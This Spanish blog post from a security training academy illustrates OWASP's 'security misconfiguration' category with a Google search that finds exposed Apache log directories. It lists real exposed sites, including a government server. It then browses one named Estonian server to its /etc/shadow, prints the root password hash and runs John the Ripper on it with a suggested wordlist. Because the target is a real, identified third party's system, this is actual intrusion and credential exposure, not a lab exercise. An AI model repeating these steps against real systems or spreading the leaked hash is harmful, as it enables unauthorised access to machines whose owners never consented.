Aprovechando que nos encontramos a medio de uno de los Cursos de Auditoría de Aplicaciones Web con Metodología OWASP 3.0 vamos a hablar sobre el dominio A6 que trata sobre configuración deficiente de Seguridad y que podeis consultar en su página oficial https://www.owasp.org/index.php/Top_10_2010-A6-Security_Misconfiguration

En concreto, vamos a ver lo fácil que resulta buscar ficheros y directorios desprotegidos que incluso podrán llevarnos a conocer completamente o incluso conseguir un acceso completo al sistema.

Para la prueba de concepto, podemos ayudarnos de la herramienta online Google Hacking Database (GHDB) y googleando un poco, podemos ver como hay algunas que se encuentran datadas del 2004 o incluso antes.

Por ejemplo, vamos a usar en google el siguiente término de búsqueda basado en http://www.hackersforcharity.org/ghdb/?function=detail&id=219 y actualizado al 2012 para intentar encontrar términos como los ficheros logs de Apache2 que a más de uno, como decimos, tan sólo le sirven para ocupar espacio en la unidad de almacenamiento.

En google escribimos:

inurl:/var/log/apache2
					

Creeis que todavía es posible encontrar los logs abiertos para libre consulta?

Mostramos algunos resultados que hemos encontrado como:

http://notebook.cowgar.com/access.log
http://geoservice.igac.gov.co/Ruteador/dz/var/log/apache2/
88.198.2.45/qfw1/var/log/apache2/
http://al-one.usermin.absolutelegends.eu/var/log/apache2/
					

Y para ver si eran rastros, pues miramos las fechas y efectivamente, siguen funcionando a fecha de hoy!!!

En particular, nos quedamos con otro que hemos encontrado:

http://server.kuukulgur.ee/AVALIK/joel/live/var/
					

Desde aquí, podemos "navegar" tranquilamente en busca del fichero /etc/shadow o cualquier otra cosa que nos permita tomar el control de la máquina… Incluso, en el /proc podemos mirar en tiempo real los procesos que se encuentran en ejecución, etc...

Efectivamente, si se encuentra el fichero /etc/shadow y es accesible. Un 10 para la productora de Estonia por velar por la seguridad del pobre Joel...

Nos quedamos con un pequeño usuario que nos podrá hacer grandes:

root:oEGNMJW.tJZLE:14771:0:99999:7:::
					

Pues adelante, copiaremos y pegaremos el root:password en fichero.txt y lo mandaremos a "John The Ripper":

john fichero.txt
Loaded 1 password hash (Traditional DES [24/32 4K])
					

Ahora, un café y a la vuelta:

john –show fichero.txt
					

Recordar que en Estonia hablan el “estón” y que podemos usar un diccionario con la opción –w:diccionario.lst

Ah, y se me olvida, no usan 6 letras de nuestro alfabeto pero incluyen 6 de las suyas.

Y aunque estamos casi a finales del año 2012, por algo sigue ocupando dentro de la Metodología OWAP el número 6!!!

Recuerda que en Academia MADESYP nos encontramos impartiendo Cursos especializados en Seguridad Informática donde realizamos y establecemos las contramedidas para las pruebas de concepto con todo ésto y mucho más...

Ser buenos y no hagais maldades!!!